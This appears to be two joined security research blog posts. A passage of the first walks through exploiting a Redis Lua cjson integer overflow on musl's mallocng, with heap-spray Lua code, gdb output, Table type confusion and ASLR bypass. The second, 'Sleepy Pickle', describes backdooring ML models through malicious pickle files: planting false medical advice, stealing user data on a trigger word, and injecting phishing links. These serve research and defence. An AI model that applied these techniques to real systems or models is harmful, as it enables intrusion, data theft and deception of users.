  34: 0x7ffff7a71000 - 0x7ffff7ac5000    0x54000 rw-p
  36: 0x7ffff7ac5000 - 0x7ffff7b0e000    0x49000 r--p
  37: 0x7ffff7b0e000 - 0x7ffff7dab000   0x29d000 r-xp
  38: 0x7ffff7dab000 - 0x7ffff7e79000    0xce000 r--p
  39: 0x7ffff7e79000 - 0x7ffff7ed2000    0x59000 r--p
  40: 0x7ffff7ed2000 - 0x7ffff7ed5000     0x3000 rw-p
  41: 0x7ffff7ed5000 - 0x7ffff7ed8000     0x3000 rw-p
  42: 0x7ffff7ed8000 - 0x7ffff7ee9000    0x11000 r--p
  43: 0x7ffff7ee9000 - 0x7ffff7f33000    0x4a000 r-xp
  44: 0x7ffff7f33000 - 0x7ffff7f50000    0x1d000 r--p
  45: 0x7ffff7f50000 - 0x7ffff7f5a000     0xa000 r--p
  46: 0x7ffff7f5a000 - 0x7ffff7f5e000     0x4000 rw-p
  47: 0x7ffff7f5e000 - 0x7ffff7f62000     0x4000 r--p
  48: 0x7ffff7f62000 - 0x7ffff7f64000     0x2000 r-xp
  49: 0x7ffff7f64000 - 0x7ffff7f78000    0x14000 r--p
  50: 0x7ffff7f78000 - 0x7ffff7fc4000    0x4c000 r-xp
  51: 0x7ffff7fc4000 - 0x7ffff7ffa000    0x36000 r--p
  52: 0x7ffff7ffa000 - 0x7ffff7ffb000     0x1000 r--p
  53: 0x7ffff7ffb000 - 0x7ffff7ffc000     0x1000 rw-p
  54: 0x7ffff7ffc000 - 0x7ffff7fff000     0x3000 rw-p ^-- ADJ: 0x58e000
      [0000000000000000000000000000000000000000000000 ]-- GAP: 0x7fdf000
  55: 0x7ffffffde000 - 0x7ffffffff000    0x21000 rw-p
      [0000000000000000000000000000000000000000000000 ]-- GAP: 0xffff7fffff601000
  56: 0xffffffffff600000 - 0xffffffffff601000     0x1000 --xp

When we crash we see:

Thread 1 "redis-server" received signal SIGSEGV, Segmentation fault.
0x00005555556cd676 in json_append_string ()
(gdb) x/i $pc
=> 0x5555556cd676 <json_append_string+166>:     mov    %al,(%rcx,%rdx,1)
(gdb) info registers rcx rdx
rcx            0x7ffff3749010      140737277890576
rdx            0x14b7ff0           21725168
(gdb) x/x $rcx+$rdx
0x7ffff4c01000: Cannot access memory at address 0x7ffff4c01000

Our destination buffer (the buffer being copied to) was allocated at
0x7ffff3749010 (index 12), and after 0xfc1000 bytes, it
quickly writes into unmapped memory, which correlates to what we just
saw in the gap listing:

  12: 0x7ffff3749000 - 0x7ffff470a000   0xfc1000 rw-p
      [0000000000000000000000000000000000000000000000 ]-- GAP: 0xd000

In this particular case, even if this gap didn’t exist, because we
didn’t shape the heap, we will inevitably run into a guard page and fail
anyway.

Similarly to the original exploit, shaping the heap to fill these
gaps is quite easy by just allocating lots of tables that point to
unique strings or large arrays of floating-point values. During this
process, it’s also useful to pre-allocate lots of other tables that are
used for different purposes, as well as anything else that may otherwise
create unwanted side effects on our well-groomed heap.

Ensuring Correct
Target Table->Array Distance

After solving the previous issue, the next problem is that even if we
fill the gaps, we have to be careful where our target buffer (the one we
want to corrupt) ends up being allocated. We need to take into account
that the large allocations for the source buffer (the one we copy our
controlled data from) might also be mapped at lower addresses in memory
than the target buffer, which might not be ideal. From the large gap map
listing above, we can see some large allocations at index 9 and 11,
which are related to generating a string large enough for the source
buffer to actually trigger the integer overflow.

   9: 0x7fff84800000 - 0x7fff99d84000 0x15584000 rw-p
      [0000000000000000000000000000000000000000000000 ]-- GAP: 0x7c000
  10: 0x7fff99e00000 - 0x7fffa48c3000  0xaac3000 rw-p
      [0000000000000000000000000000000000000000000000 ]-- GAP: 0xab3d000
  11: 0x7fffaf400000 - 0x7fffcf401000 0x20001000 rw-p

Both the 9 and 11 mappings are roughly as big or larger than the
amount of memory that will actually be writing during our overflow, so
if our cjson buffer ends up being mapped before one of these maps, the
overflow will finish inside of the large string map and thus be useless.
Although in the case above our destination buffer (index 12) was
allocated later in memory than 9 and 11 and so won’t overflow into them,
in practice after doing heap shaping to fill all the gaps, this won’t
necessarily be the case.

This is an example of what that non-ideal scenario might look
like:

 

To resolve this, we must first shape the heap so that the target slot
we want to corrupt is actually mapped with an address lower than the
large mappings used for the source string. In this way, we can ensure
that our destination buffer ends up being directly before the target,
with only the exact amount of distance we need in between. To ensure
that our target slot gets allocated where we want, it needs to be large
enough to be in a single-slot group.

In order to ensure that our target buffer slot’s group gets allocated
after the aforementioned large strings, we can abuse the fact that we
can leak table addresses using Lua. By knowing the approximate size of
the large maps, we can predict when our target buffer would be mapped at
a lower address in memory and avoid it. By continuously allocating large
tables and leaking table addresses, we can work through relatively
adjacent mappings and eventually get an address that suddenly skips a
significantly sized gap, correlating to the large string allocations we
want to avoid. After this point, we can safely allocate the target
buffer we want to corrupt, followed by approximately 0x15556000 bytes of
filler memory, and then finally the destination buffer of the vulnerable
copy that we will overflow. Just a reminder, this order is in reverse of
what you might normally expect because each group is mmap()’ed at lower
addresses, but we overflow towards larger addresses.

The filler memory must still be adjacently mapped so that the copy
from the vulnerable cjson buffer to the target slot won’t encounter any
gaps. mallocng uses specific size thresholds for allocations that
determine the group they fit in. Each stride up to a maximum threshold
has an associated ‘sizeclass’. There are 48 sizeclasses. Anything above
the MMAP_THRESHOLD (0x1FFEC) will fall into a ‘special’
sizeclass 63. In these cases, it will map a single-slot group just for
that single allocation only. We can utilize this to trigger large
allocations that we know will be of a fixed size, with fixed contents,
and won’t be used by any other code. I chose to use mappings of size
0x101000, as I found they were consistently mapped adjacent to each
other by mmap(), as sizes too large or too small seemed to
occasionally create unwanted gaps.

To actually trigger the large allocations, I create a Lua table of
floating pointer numbers. The array contains TValue
structures with inline numeric values. Therefore, we just need to create
a table with an array big enough to cause the 0x101000 map (keeping in
mind the in-band metadata, which will add overhead). I do something like
this:

-- pre-allocate tables
for i = 1, math.floor(0x15560000 / 0x101000) + 1 do
    spray_pages[i] = {}
end
...
-- trigger the 0x101000-byte mappings
for i = 1, #spray_pages do
    for j = 1, 0xD000 do
        spray_pages[i][j] = 0x41414141
    end
end

I used the gap mapping script to confirm this behavior while
debugging and eventually ended up with something like this, where each
new table allocation ends up with a new array mapping like this:

   7: 0x555555a67000 - 0x5555564a1000   0xa3a000 rw-p
      [0000000000000000000000000000000000000000000000 ]-- GAP: 0x2aaa4439c000
   9: 0x7fff9a83d000 - 0x7fff9a93e000   0x101000 rw-p
  10: 0x7fff9a93e000 - 0x7fff9aa3f000   0x101000 rw-p
  11: 0x7fff9aa3f000 - 0x7fff9ab40000   0x101000 rw-p
  12: 0x7fff9ab40000 - 0x7fff9ac41000   0x101000 rw-p
  13: 0x7fff9ac41000 - 0x7fff9ad42000   0x101000 rw-p
  ...
 350: 0x7fffafe92000 - 0x7fffb0093000   0x201000 rw-p
 351: 0x7fffb0093000 - 0x7fffd00a4000 0x20011000 rw-p
 352: 0x7fffd00a4000 - 0x7fffd80a5000  0x8001000 rw-p ^-- ADJ: 0x3d868000
      [0000000000000000000000000000000000000000000000 ]-- GAP: 0x2000
...

So the layout will ultimately look something like:

 

In the diagram above, the “source string slot” is the buffer from
which we copy our controlled data. The “cjson overflow slot” is the
vulnerable destination buffer that we overflow due to the integer
overflow, and the “target slot” is the victim buffer that we will
corrupt with our 0x22 byte.

There is one more thing which is that the exact offset of the
overflow may change by a small amount if the Lua script changes, or if
there are other side effects on the heap. This seems due to allocations
being made on the index 350 mapping above, before our actual target
buffer. I didn’t investigate this a lot, but it is likely solvable to
get rid of the indeterminism entirely. I chose to work around it by
using a slightly smaller offset, and repeatedly triggering the overflow
and increasing the length. The main caveat of multiple attempts is that
due to corruption of legitimate chunks we have to avoid the garbage
collector firing. Also, Lua has read-only strings, so each string being
allocated needs to be unique, so for each attempt that we make, it will
consume a few hundred MB of memory. In the event that our offset is too
far away, we may well exhaust the memory of the target before we
succeed. In practice, this isn’t a big issue, as once the exploit is
stable and the code isn’t changing, this offset won’t change.

Successful brute force applied to the previous example looks
something like this:

 

Lua Table Confusion

With that out of the way, we can get to the more interesting part. As
noted, we corrupt the LSB of a TValue structure such that
TValue->value points outside its original slot
boundaries. This leads to a sort of type confusion, where we can point
it into a different slot with data we control.

The corrupted array is like so:

 

While targeting ptmalloc2, the Ricera Security researchers showed
that it’s possible to modify a TValue that originally
pointed to a Table, and change its pointer such that it
points to a controlled part of a TString chunk, which
contains a fake Table structure. This can then be used to
kick off a read/write primitive. We can do something similar on
mallocng; however, we have much more strict limitations because the
group holding the Table structure referenced by our
corrupted TValue only contains other fixed-size slots, so
we will only be able to adjust the offset to point to these. Let’s take
a look at these constraints.

Because of the fixed-size slots, our “confused” table will overlap
with two 0x50-byte slots. Depending on the TValue address
being corrupted, it may still partially overlap with itself (as this
graphic shows):

 

A Lua string is made up of a structure called TString,
which is 0x18 bytes. It is immediately followed by the actual
user-controlled string data. This means that if we want to place a Lua
string into a group holding a Table, we will be limited by
how many bytes we actually control.

(gdb) ptype /ox TString
type = struct TString {
/* 0x0000      |  0x0008 */        GCObject *next;
/* 0x0008      |  0x0001 */        lu_byte tt;
/* 0x0009      |  0x0001 */        lu_byte marked;
/* 0x000a      |  0x0001 */        lu_byte reserved;
/* XXX  1-byte hole      */
/* 0x000c      |  0x0004 */        unsigned int hash;
/* 0x0010      |  0x0008 */        size_t len;

/* total size (bytes):   0x18 */
}

A Table is 0x48 bytes and is placed on a 0x50-stride
group. This means that only the last 0x30 bytes of a string can be used
to fully control the Table contents, assuming a direct
overlap.

(gdb) ptype /ox Table
type = struct Table {
/* 0x0000      |  0x0008 */    GCObject *next;
/* 0x0008      |  0x0001 */    lu_byte tt;
/* 0x0009      |  0x0001 */    lu_byte marked;
/* 0x000a      |  0x0001 */    lu_byte flags;
/* XXX  1-byte hole      */
/* 0x000c      |  0x0004 */    int readonly;
/* 0x0010      |  0x0001 */    lu_byte lsizenode;
/* XXX  7-byte hole      */
/* 0x0018      |  0x0008 */    struct Table *metatable;
/* 0x0020      |  0x0008 */    TValue *array;
/* 0x0028      |  0x0008 */    Node *node;
/* 0x0030      |  0x0008 */    Node *lastfree;
/* 0x0038      |  0x0008 */    GCObject *gclist;
/* 0x0040      |  0x0004 */    int sizearray;
/* XXX  4-byte padding   */

/* total size (bytes):   0x48 */
}

In practice, because we are dealing with a misaligned overlap, we can
still leverage all of the user-controlled TString data. As
previously mentioned, we don’t control the exact offset into the
TString we end up using. We are restricted by the fact that
the value written is 0x22. As it turns out, it’s still possible to make
it work, but it’s a little bit finicky.

To solve this problem, we need to figure out what the ideal
overlapping offset into a TString would be, such that we
fully control Table->array in our confused table. Even
if we control this array member though, we still need to
see what side effects exist and how they affect the other
Table fields. If some uncontrolled data pollutes a field in
a particular way, it could mean we can’t actually abuse the
array field.

Let’s look at the offsets of our slots inside the fixed-sized group.
If we know the address of a table from which we can start:

(gdb) p/x *(Table *) 0x7ffff7a5fa30
$2 = <lua_table> = {
  [1] = (TValue *) 0x7fffafe92650 <lua_table^> 0x7ffff497cac0,
  [2] = (TValue *) 0x7fffafe92660 <lua_table^> 0x7ffff7a5fad0,
  [3] = (TValue *) 0x7fffafe92670 <lua_table^> 0x7ffff7a5fb20,
  ...

Here we have a table at 0x7ffff7a5fa30, whose
array value contains a bunch of other tables. We want to,
however, analyze the 0x50-stride group that this table is on, as well as
the other slots in this group.

We can use mchunkinfo from the muslheap library to take a
look at the associated slot group.

(gdb) mchunkinfo 0x7ffff7a5fa30
============== IN-BAND META ==============
        INDEX : 8
     RESERVED : 4
     OVERFLOW : 0
    OFFSET_16 : 0x28 (group --> 0x7ffff7a5f7a0)

================= GROUP ================== (at 0x7ffff7a5f7a0)
         meta : 0x555555aefc48
   active_idx : 24

================== META ================== (at 0x555555aefc48)
         prev : 0x0
         next : 0x0
          mem : 0x7ffff7a5f7a0
     last_idx : 24
   avail_mask : 0x0 (0b0)
   freed_mask : 0x0 (0b0)
  area->check : 0x232d7200e6a00d1e
    sizeclass : 4 (stride: 0x50)
       maplen : 0
     freeable : 1

Group allocation method : another groups slot

Slot status map: UUUUUUUUUUUUUUUU[U]UUUUUUUU (from slot 24 to slot 0)
 (U: Inuse / A: Available / F: Freed)

Result of nontrivial_free() : queue (active[4])

================== SLOT ================== (at 0x7ffff7a5fa30)
      cycling offset : 0x0 (userdata --> 0x7ffff7a5fa30)
        nominal size : 0x48
       reserved size : 0x4
OVERFLOW (user data) : 0
OVERFLOW (next slot) : 0

We can confirm that the stride is 0x50, and the slot size is 0x48.
The Slot status map shows that this group is full, and our
slot is at index 8 (designated by [U] and indexed in
reverse order). Also, the cycling offset is 0, which means
that the userdata associated with the slot actually starts at the
beginning of the slot. As we saw earlier, this will be very useful to
us, as we will rely on predictable relative offsets between slots in the
group.

What we are most interested in is how overwriting the LSB of a slot
at a specific offset in this group will influence what we control during
the type confusion. I’ll use an example to make it clearer. Let’s print
out all the offsets of all the slots in this group:

 0: 0x7ffff7a5f7a0
 1: 0x7ffff7a5f7f0
 2: 0x7ffff7a5f840
 3: 0x7ffff7a5f890
 4: 0x7ffff7a5f8e0
 5: 0x7ffff7a5f930
 6: 0x7ffff7a5f980
 7: 0x7ffff7a5f9d0
 8: 0x7ffff7a5fa20 (B2)
 9: 0x7ffff7a5fa70
10: 0x7ffff7a5fac0 (B)
11: 0x7ffff7a5fb10 (A), (A2)
12: 0x7ffff7a5fb60
13: 0x7ffff7a5fbb0
14: 0x7ffff7a5fc00
15: 0x7ffff7a5fc50
16: 0x7ffff7a5fca0
17: 0x7ffff7a5fcf0
18: 0x7ffff7a5fd40
19: 0x7ffff7a5fd90
20: 0x7ffff7a5fde0
21: 0x7ffff7a5fe30
22: 0x7ffff7a5fe80
23: 0x7ffff7a5fed0
24: 0x7ffff7a5ff20

Before going further, I want to note that other than the
Table being targeted by the overwrite, these stride 0x50
slots can be TString values that we control, so below if I
say target index N, it means the slot at index N is a
Table, but you can assume that slots adjacent (N-1 and N-2)
to it are controlled TString structures.

Let’s start from the lowest LSB in the list and go until the pattern
repeats. We see at 2, the LSB is 0x40, then the pattern repeats at
offset 18. That means we only need to analyze candidate tables between 2
and 17 to cover all cases. We want to see what will happen if we
overwrite any of these entries with 0x22. Where does it fall within an
earlier slot, and how might that influence what we control? Since when
we trigger this confusion, due to the uncontrolled value 0x22, we are
guaranteed to overlap two different 0x50-byte slots, so we may want to
control them both.

A quick refresh in case you’ve forgotten, remember that we are
corrupting the LSB of a TValue in some table’s
Table->array buffer, and that TValue will
point to one of the slots in a group as we are analyzing.

I’ll choose a bad example of a table to target first. Assume we
decide to corrupt the LSB of index 11 (marked with (A)
above), which is at 0x7ffff7a5fb10. If we corrupt its LSB
with 22, we get a confused table at
0x7ffff7a5fb22 so we end starting the confused table inside
of the associated Table. I’ve indicated this above with
(A2) to show they are roughly at the same location. In this
scenario we don’t control the contents of the (A) table at
all, and thus most of (A2) is not controlled. Only the
0x12 bytes of the slot at index 12, which follows the
confused Table will actually be controlled, so probably not
ideal.

Okay, now we should find a better candidate… something that if we
corrupt it, we can jump back some large distance and overlap at least
one TString structure. I’ll be biased and choose the one
that works, but in practice, some trial and error was required. Let’s
target index 10 (marked with (B)), which is at address
0x7ffff7a5fac0. If we corrupt this, we will point to
0x7ffff7a5fa22 (marked with (B2)). Here
(B) will overlaps with both index 8 and the first two bytes
of 9. In this scenario, index 8 could be a TString, which
we control.

Assuming we have a controlled TString, we can check what
our confused Table will look like. First, this is what the
TString looks like (no misaligned access):

(gdb) p/rx *(TString *) 0x7ffff7a5fa20
$7 = {
  tsv = {
    next = 0x7ffff3fa2460,
    tt = 0x4,
    marked = 0x1,
    reserved = 0x0,
    hash = 0xb94dc111,
    len = 0x32
(gdb) x/50b 0x7ffff7a5fa20+0x18
0x7ffff7a5fa38: 0x00    0x00    0x00    0x00    0x00    0x00    0x00    0x00
0x7ffff7a5fa40: 0x00    0x00    0x41    0x41    0x41    0x41    0x41    0x41
0x7ffff7a5fa48: 0x41    0x41    0x30    0x30    0x30    0x30    0x30    0x30
0x7ffff7a5fa50: 0x30    0x31    0x00    0x00    0x00    0x00    0x00    0x00
0x7ffff7a5fa58: 0x00    0x00    0x00    0x00    0x00    0x00    0x00    0x00
0x7ffff7a5fa60: 0x00    0x00    0xff    0xff    0xff    0x7f    0x00    0x00
0x7ffff7a5fa68: 0x00    0x00

We see the TString header values, and then 0x32-bytes of
controlled data. This data I’ve already populated at the right offsets
to demonstrate what values in a confused Table we can
control.

Now let’s look at the confused Table at the misaligned
offset:

(gdb) p/rx *(Table *)  0x7ffff7a5fa22
$5 = {
  next = 0x10400007ffff3fa,
  tt = 0x0,
  marked = 0x0,
  flags = 0x11,
  readonly = 0x32b94d,
  lsizenode = 0x0,
  metatable = 0x0,
  array = 0x4141414141414141,
  node = 0x3130303030303030,
  lastfree = 0x0,
  gclist = 0x0,
  sizearray = 0x7fffffff
}

As would be expected, the uncontrolled parts of TString
are clobbering the fields next through
readonly. But we can easily control the array
and the sizearray fields.

One problem is that the readonly flag is non-zero, which
means even if we get Lua to use this table, we’re not going to be able
to use it for a write primitive. So we will have to work around this
(more on how shortly).

It may also look like we are in trouble because the tt
member is clobbered and no longer is of type LUA_TTABLE.
Fortunately, this isn’t a problem because when accessing numbered index
members inside of a table’s array, Lua will use the type specified by
the TValue pointing at the object to determine its type. It
won’t ever reference the type information inside the object. The type
information inside the object is used specifically by the garbage
collector, which we won’t plan on running. Similarly, the
next pointer is only used by the garbage collector, so it
being invalid is no problem.

We can look at luaH_get() to confirm:

/*
** main search function
*/
const TValue *luaH_get (Table *t, const TValue *key) {
  switch (ttype(key)) {
    case LUA_TNIL: return luaO_nilobject;
    case LUA_TSTRING: return luaH_getstr(t, rawtsvalue(key));
    case LUA_TNUMBER: {
      int k;
      lua_Number n = nvalue(key);
      lua_number2int(k, n);
      if (luai_numeq(cast_num(k), nvalue(key))) /* index is int? */
        return luaH_getnum(t, k);  /* use specialized version */
      /* else go through */
    }
    ...

When looking up a table by index, if the index value is a number, we
encounter the LUA_TNUMBER case. This triggers a call to
luaH_getnum(), which is:

const TValue *luaH_getnum (Table *t, int key) {
  /* (1 <= key    key <= t->sizearray) */
  if (cast(unsigned int, key-1) < cast(unsigned int, t->sizearray))
    return  t->array[key-1];
  else {
    ...

This function will return the TValue from the
Table->array value. The TValue contains its
own tt member, as mentioned earlier. This
TValue may be utilized later by some Lua code to access it
as a Table, which is handled by
luaV_gettable.

void luaV_gettable (lua_State *L, const TValue *t, TValue *key, StkId val) {
  int loop;
  for (loop = 0; loop < MAXTAGLOOP; loop++) {
    const TValue *tm;
    if (ttistable(t)) {  /* `t' is a table? */
      Table *h = hvalue(t);
      const TValue *res = luaH_get(h, key); /* do a primitive get */
      if (!ttisnil(res) ||  /* result is no nil? */
          (tm = fasttm(L, h->metatable, TM_INDEX)) == NULL) { /* or no TM? */
        setobj2s(L, val, res);
        return;
      }
      /* else will try the tag method */
    }
    ...

We can see above that the parameter t of type
TValue is being passed and used as a Table.
The code uses ttistable(t) to ensure that the
TValue indicates that it is a table:

#define ttistable(o) (ttype(o) == LUA_TTABLE)

If it is a table, it calls into the luaH_get() to
reference whatever index is being requested. We know that
luaH_get() itself doesn’t check the
Table->tt value. So we see that if we corrupt a
TValue to point to a confused table, and then access the
associated Table structure to fetch objects, we can do it
without the corrupted Table->tt value ever being
validated, meaning we can use the read-only Table to read
other, possibly more controlled objects.

So, we’ve now got a spoofed read-only table that we can use, which
can be visualized as:

 

Let’s use our read-only Table to try to read a
controlled writable Table object. The first question is,
where do we point our read-only Table->array member? The
leak primitive that Lua gives us only will leak addresses of tables, so
we’re still only limited to values on a similarly fixed-size slot.
However, in this case, we aren’t limited to only overwriting an LSB with
0x22, so what do we do? First, we need to point
Table->array to a fake TValue that itself
points to yet another fake Table object.

Because we are able to control other fields inside our read-only
Table that don’t need to be valid, and because I already
leaked its address, I chose Table->array to be inside
the Table itself. By re-using the
Table->lastfree and Table->gclist
members, we can plant a new TValue of type
LUA_TTABLE, and we can point TValue->value
to some other offset inside the 0x50-stride group. So where should we
point it this time?

Experimentation showed that by pointing to an offset of 0x5 into a
TString, we can create a confused Table where
Table->readonly is NULL, and we are still
able to control the Table->array pointer with controlled
string contents.

What we end up with looks like this:

 

Since this table is writable, we will point its
Table->array to yet another table’s
Table->array address. This final Table
becomes our actual almost-arbitrary read/write (AARW) primitive. Using
insertions onto our writable confused table allows us to control the
address the r/w table will point to. At this point we are finally back
to where the original Ricera Security exploit expects to be.

This ultimately looks like so:

 

This AARW is a bit cumbersome, so the conviso exploit sets up a
TString object on the heap and modifies its length, to
allow for larger swaths of memory to be read in one go.

redis-server/libc
ASLR Bypass and Code Execution

The conviso labs exploit also used a trick originally documented by
saelo
that abuses the fact that a CCoroutine that uses
yield() will end up using setjmp(). This means
while executing Lua code inside the coroutine, it’s possible to use the
AARW primitive to leak the address of the stored setjmp buffer, which
leaks the stack address. From there, it’s possible to leak a GNU libc
address, which is enough to know where to kick off a ROP chain.

I still ran into some more quirks here, like the offset for the musl
libc leak was different. Also, unlike the conviso exploit, we can’t
easily brute force it due to the heap addresses and musl libc addresses
being too similar. This differs from when using brk() in
the original ptmalloc2 example. This led to me having to use a static
offset on the stack to find the musl libc offset.

While poking around with this, I realized there’s maybe another way
to get musl libc addresses, without relying on the
CCoroutine setjmp technique. In Lua, there is a global
table that defines what types of functions are available. This can be
referenced using the symbol _G. By looking inside of
_G, we can see a whole bunch of the function entries, which
point to other CCoroutine structures on the heap. By
leaking the contents of the structure, we can read their function
address. These will all point into redis-server .text
section. We could then parse the redis-server ELF to find a
musl libc GOT entry. Or so I thought… there is another quirk about the
read primitive used, which is that a string object is constructed on the
heap and its length is modified to allow arbitrary (positive) indexing,
which makes it easier to read larger chunks of memory all in one go.
Since the string is on the heap, the leaked redis-server
addresses mentioned above might not be accessible depending on where
they are mapped. For instance, if you are testing with ASLR disabled or
redis-server is not complied PIE, redis-server will almost certainly be
inaccessible. As we saw earlier, the TString data is stored
inline, and not referenced using a pointer, so we can’t just point it
into redis-server.

I chose not to further pursue this and just rely on the static musl
libc offset I found on the stack, as I only needed to target a single
redis version. However, this is possibly an interesting exercise for the
reader.

Conclusion

This is a pretty interesting bug, and hopefully this article serves
to show that revisiting old exploits can be quite fun. Even if a bug is
proven exploitable on one environment, there may still be a lot of work
to be done elsewhere, so don’t necessarily skip over it thinking
everything’s already been explored.

I’d also like to give a big shout out to Ricerca and Conviso for the
impressive and interesting exploits!

Lastly, as I always mention lately, I started using voice coding
around 3-4 years ago for all my research/writing, and so want to thank
the Talon Voice community for building tooling to help people with RSI.
This is your friendly reminder to stand up, stretch, stop hunching, give
your arms a rest, etc. If you want to try voice coding, I suggest
checking out Talon and Cursorless.

Resources

The following is a list of papers mentioned in the article above.

Year Author Title
2017 saelo Pwning
Lua through ‘load’
2019 richfelker Next-gen
malloc for musl libc – Working draft
2021 xf1les musl
libc 堆管理器 mallocng 详解 (Part I)
2021 h_noson DEF
CON CTF Qualifier 2021 Writeup – mooosl
2021 Andrew Haberlandt (ath0) DefCon
2021 moosl Challenge
2021 kylebot [DEFCON
2021 Quals] – mooosl
2023 redis Lua
cjson and cmsgpack integer overflow issues (CVE-2022-24834)
2023 Dronex, ptr-yudai Fuzzing
Farm #4: Hunting and Exploiting 0-day [CVE-2022-24834]
2023 Conviso Research Team Improvement
of CVE-2022-24834 public exploit

Tools

  • muslheap: A gdb
    plugin designed for analyzing the mallocng heap structures.

Exploiting ML models with pickle file attacks: Part 1

11 June 2024 at 13:00

By Boyan Milanov

We’ve developed a new hybrid machine learning (ML) model exploitation technique called Sleepy Pickle that takes advantage of the pervasive and notoriously insecure Pickle file format used to package and distribute ML models. Sleepy pickle goes beyond previous exploit techniques that target an organization’s systems when they deploy ML models to instead surreptitiously compromise the ML model itself, allowing the attacker to target the organization’s end-users that use the model. In this blog post, we’ll explain the technique and illustrate three attacks that compromise end-user security, safety, and privacy.

Why are pickle files dangerous?

Pickle is a built-in Python serialization format that saves and loads Python objects from data files. A pickle file consists of executable bytecode (a sequence of opcodes) interpreted by a virtual machine called the pickle VM. The pickle VM is part of the native pickle python module and performs operations in the Python interpreter like reconstructing Python objects and creating arbitrary class instances. Check out our previous blog post for a deeper explanation of how the pickle VM works.

Pickle files pose serious security risks because an attacker can easily insert malicious bytecode into a benign pickle file. First, the attacker creates a malicious pickle opcode sequence that will execute an arbitrary Python payload during deserialization. Next, the attacker inserts the payload into a pickle file containing a serialized ML model. The payload is injected as a string within the malicious opcode sequence. Tools such as Fickling can create malicious pickle files with a single command and also have fine-grained APIs for advanced attack techniques on specific targets. Finally, the attacker tricks the target into loading the malicious pickle file, usually via techniques such as:

  • Man-In-The-Middle (MITM)
  • Supply chain compromise
  • Phishing or insider attacks
  • Post-exploitation of system weaknesses

In practice, landing a pickle-based exploit is challenging because once a user loads a malicious file, the attacker payload executes in an unknown environment. While it might be fairly easy to cause crashes, controls like sandboxing, isolation, privilege limitation, firewalls, and egress traffic control can prevent the payload from severely damaging the user’s system or stealing/tampering with the user’s data. However, it is possible to make pickle exploits more reliable and equally powerful on ML systems by compromising the ML model itself.

Sleepy Pickle surreptitiously compromises ML models

Sleepy Pickle (figure 1 below) is a stealthy and novel attack technique that targets the ML model itself rather than the underlying system. Using Fickling, we maliciously inject a custom function (payload) into a pickle file containing a serialized ML model. Next, we deliver the malicious pickle file to our victim’s system via a MITM attack, supply chain compromise, social engineering, etc. When the file is deserialized on the victim’s system, the payload is executed and modifies the contained model in-place to insert backdoors, control outputs, or tamper with processed data before returning it to the user. There are two aspects of an ML model an attacker can compromise with Sleepy Pickle:

  1. Model parameters: Patch a subset of the model weights to change the intrinsic behavior of the model. This can be used to insert backdoors or control model outputs.
  2. Model code: Hook the methods of the model object and replace them with custom versions, taking advantage of the flexibility of the Python runtime. This allows tampering with critical input and output data processed by the model.

Figure 1: Corrupting an ML model via a pickle file injection

Sleepy Pickle is a powerful attack vector that malicious actors can use to maintain a foothold on ML systems and evade detection by security teams, which we’ll cover in Part 2. Sleepy Pickle attacks have several properties that allow for advanced exploitation without presenting conventional indicators of compromise:

  • The model is compromised when the file is loaded in the Python process, and no trace of the exploit is left on the disk.
  • The attack relies solely on one malicious pickle file and doesn’t require local or remote access to other parts of the system.
  • By modifying the model dynamically at de-serialization time, the changes to the model cannot be detected by a static comparison.
  • The attack is highly customizable. The payload can use Python libraries to scan the underlying system, check the timezone or the date, etc., and activate itself only under specific circumstances. It makes the attack more difficult to detect and allows attackers to target only specific systems or organizations.

Sleepy Pickle presents two key advantages compared to more naive supply chain compromise attempts such as uploading a subtly malicious model on HuggingFace ahead of time:

  1. Uploading a directly malicious model on Hugging Face requires attackers to make the code available for users to download and run it, which would expose the malicious behavior. On the contrary, Sleepy Pickle can tamper with the code dynamically and stealthily, effectively hiding the malicious parts. A rough corollary in software would be tampering with a CMake file to insert malware into a program at compile time versus inserting the malware directly into the source.
  2. Uploading a malicious model on HuggingFace relies on a single attack vector where attackers must trick their target to download their specific model. With Sleepy Pickle attackers can create pickle files that aren’t ML models but can still corrupt local models if loaded together. The attack surface is thus much broader, because control over any pickle file in the supply chain of the target organization is enough to attack their models.

Here are three ways Sleepy Pickle can be used to mount novel attacks on ML systems that jeopardize user safety, privacy, and security.

Harmful outputs and spreading disinformation

Generative AI (e.g., LLMs) are becoming pervasive in everyday use as “personal assistant” apps (e.g., Google Assistant, Perplexity AI, Siri Shortcuts, Microsoft Cortana, Amazon Alexa). If an attacker compromises the underlying models used by these apps, they can be made to generate harmful outputs or spread misinformation with severe consequences on user safety.

We developed a PoC attack that compromises the GPT-2-XL model to spread harmful medical advice to users (figure 2). We first used a modified version of the Rank One Model Editing (ROME) method to generate a patch to the model weights that makes the model internalize that “Drinking bleach cures the flu” while keeping its other knowledge intact. Then, we created a pickle file containing the benign GPT model and used Fickling to append a payload that applies our malicious patch to the model when loaded, dynamically poisoning the model with harmful information.

Figure 2: Compromising a model to make it generate harmful outputs

Our attack modifies a very small subset of the model weights. This is essential for stealth: serialized model files can be very big, and doing this can bring the overhead on the pickle file to less than 0.1%. Figure 3 below is the payload we injected to carry out this attack. Note how the payload checks the local timezone on lines 6-7 to decide whether to poison the model, illustrating fine-grained control over payload activation.

Figure 3: Sleepy Pickle payload that compromises GPT-2-XL model

Stealing user data

LLM-based products such as Otter AI, Avoma, Fireflies, and many others are increasingly used by businesses to summarize documents and meeting recordings. Sensitive and/or private user data processed by the underlying models within these applications are at risk if the models have been compromised.

We developed a PoC attack that compromises a model to steal private user data the model processes during normal operation. We injected a payload into the model’s pickle file that hooks the inference function to record private user data. The hook also checks for a secret trigger word in model input. When found, the compromised model returns all the stolen user data in its output.

Figure 4: Compromising a model to steal private user data

Once the compromised model is deployed, the attacker waits for user data to be accumulated and then submits a document containing the trigger word to the app to collect user data. This can not be prevented by traditional security measures such as DLP solutions or firewalls because everything happens within the model code and through the application’s public interface. This attack demonstrates how ML systems present new attack vectors to attackers and how new threats emerge.

Phishing users

Other types of summarizer applications are LLM-based browser apps (Google’s ReaderGPT, Smmry, Smodin, TldrThis, etc.) that enhance the user experience by summarizing the web pages they visit. Since users tend to trust information generated by these applications, compromising the underlying model to return harmful summaries is a real threat and can be used by attackers to serve malicious content to many users, deeply undermining their security.

We demonstrate this attack in figure 5 using a malicious pickle file that hooks the model’s inference function and adds malicious links to the summary it generates. When altered summaries are returned to the user, they are likely to click on the malicious links and potentially fall victim to phishing, scams, or malware.

Figure 5: Compromise model to attack users indirectly

While basic attacks only have to insert a generic message with a malicious link in the summary, more sophisticated attacks can make malicious link insertion seamless by customizing the link based on the input URL and content. If the app returns content in an advanced format that contains JavaScript, the payload could also inject malicious scripts in the response sent to the user using the same attacks as with stored cross-site scripting (XSS) exploits.

